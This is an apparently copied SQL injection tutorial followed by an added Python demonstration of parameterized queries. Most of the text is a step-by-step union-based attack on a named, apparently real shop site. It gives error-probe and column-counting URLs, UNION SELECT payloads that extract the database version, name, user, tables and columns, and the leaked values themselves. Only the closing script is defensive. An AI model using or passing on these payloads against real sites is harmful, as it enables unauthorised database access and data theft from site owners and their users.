SQL INJECTION
SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.
Example: http://www.hypetrading.com/productinfo.php?id=285
How to find a vulnerable site?
Append a single quote to the parameter value, so instead of this
http://www.hypetrading.com/productinfo.php?id=285
request this (put the ' at the end):
http://www.hypetrading.com/productinfo.php?id=285'
If the site does not change, or displays another page, then it is not vulnerable.
If the site gives an error like this
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND gepubliceerd='ja'' at line 1
then it is vulnerable.
Finding the number of columns
For that, replace the single quote ' with "order by n", increasing n until an error appears.
If that is not working, then try
order by n--
http://www.hypetrading.com/productinfo.php?id=285 order by 1-- (no error)
http://www.hypetrading.com/productinfo.php?id=285 order by 2-- (no error)
http://www.hypetrading.com/productinfo.php?id=285 order by 3-- (no error)
http://www.hypetrading.com/productinfo.php?id=285 order by 9-- (no error)
http://www.hypetrading.com/productinfo.php?id=285 order by 10-- (error)
The error looks like this:
Unknown column '10' in 'order clause'
so the number of columns is n-1, that is 9.
Next, run a UNION SELECT with one numbered placeholder per column (here 9, as in the query below). The page will then display some of those numbers; each displayed number is less than or equal to the number of columns, because it is the position of a column that the page echoes.
Like this:
It shows 4 and 3. Let's take the number 3 (any of the displayed numbers will do).
Now replace the 3 in the query with "version()":
http://www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,version(),4,5,6,7,8,9--
This gives
5.1.45
Replace version() with database() and user() to find the database name and the database user respectively.
database:
http://www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,database(),4,5,6,7,8,9--
result:- flashin_sparkms
user:
http://www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,user(),4,5,6,7,8,9--
result:- flashin_sparkms@localhost
Finding table name
http://www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
Result like:-
artcats,headlines,hoofdstukken,nieuwsbrief,proafbeeldingen,procats,producten,productenprijzen,talen,users,voorraden
Finding the column names
Now replace "group_concat(table_name)" with "group_concat(column_name)", and replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar-- -" (in the dialog box, enter the table name; in this case it is "artcats").
The mysqlchar conversion is done with the HackBar add-on for Mozilla Firefox: https://addons.mozilla.org/en-US/firefox/addon/3899
www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 FROM information_schema.columns WHERE table_name=CHAR(97, 114, 116, 99, 97, 116, 115)-- -
Now find the information: http://www.victimsite.com/index.php?id=-2
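As an added example (not code from the original post), the Python script below shows why the single-quote and "order by n--" probes from the walkthrough work against a query built by string concatenation, and how the standard fix, a parameterized query plus an integer check on the id, stops them before they reach the database. The producten table, its rows and the two lookup functions are constructed for this demonstration; only the gepubliceerd column name comes from the error message quoted above.

```python
import sqlite3

def make_db():
    # Constructed sample catalogue standing in for the productinfo.php backend
    # (column name gepubliceerd taken from the quoted error, rows invented).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE producten (id INTEGER PRIMARY KEY, naam TEXT, gepubliceerd TEXT)")
    db.executemany("INSERT INTO producten VALUES (?, ?, ?)",
                   [(284, "widget", "ja"), (285, "gadget", "ja"), (286, "draft", "nee")])
    return db

def lookup_vulnerable(db, raw_id):
    # The input is pasted into the SQL text, so a quote breaks the literal and a
    # trailing -- comments out the rest of the WHERE clause: the probes from the
    # walkthrough then change the statement instead of the search value.
    sql = ("SELECT id, naam FROM producten WHERE id = '" + raw_id
           + "' AND gepubliceerd='ja'")
    return db.execute(sql).fetchall()

def lookup_safe(db, raw_id):
    # Defence 1: id is an integer by contract, so reject anything else up front.
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    # Defence 2: bind the value; the driver sends it as data, never as SQL text.
    sql = "SELECT id, naam FROM producten WHERE id = ? AND gepubliceerd = 'ja'"
    return db.execute(sql, (int(raw_id),)).fetchall()

def probe_outcome(lookup, db, raw_id):
    """Classify what a request does: 'rows:<n>', 'sql_error' or 'rejected'."""
    try:
        return "rows:%d" % len(lookup(db, raw_id))
    except sqlite3.OperationalError:   # the "error in your SQL syntax" case
        return "sql_error"             # (SQLite words it differently from MySQL)
    except ValueError:                 # stopped by input validation
        return "rejected"

if __name__ == "__main__":
    db = make_db()
    # The probes the walkthrough uses to test for injection and count columns;
    # "order by 3" exceeds the two selected columns, hence the error.
    for probe in ["285", "285'", "285' order by 1--", "285' order by 3--"]:
        print("%-20r vulnerable=%-10s safe=%s" % (
            probe, probe_outcome(lookup_vulnerable, db, probe),
            probe_outcome(lookup_safe, db, probe)))
```

The vulnerable lookup leaks the column count through the error/no-error difference the walkthrough relies on, while the safe lookup gives the same "rejected" answer for every probe and a normal result for a well-formed id.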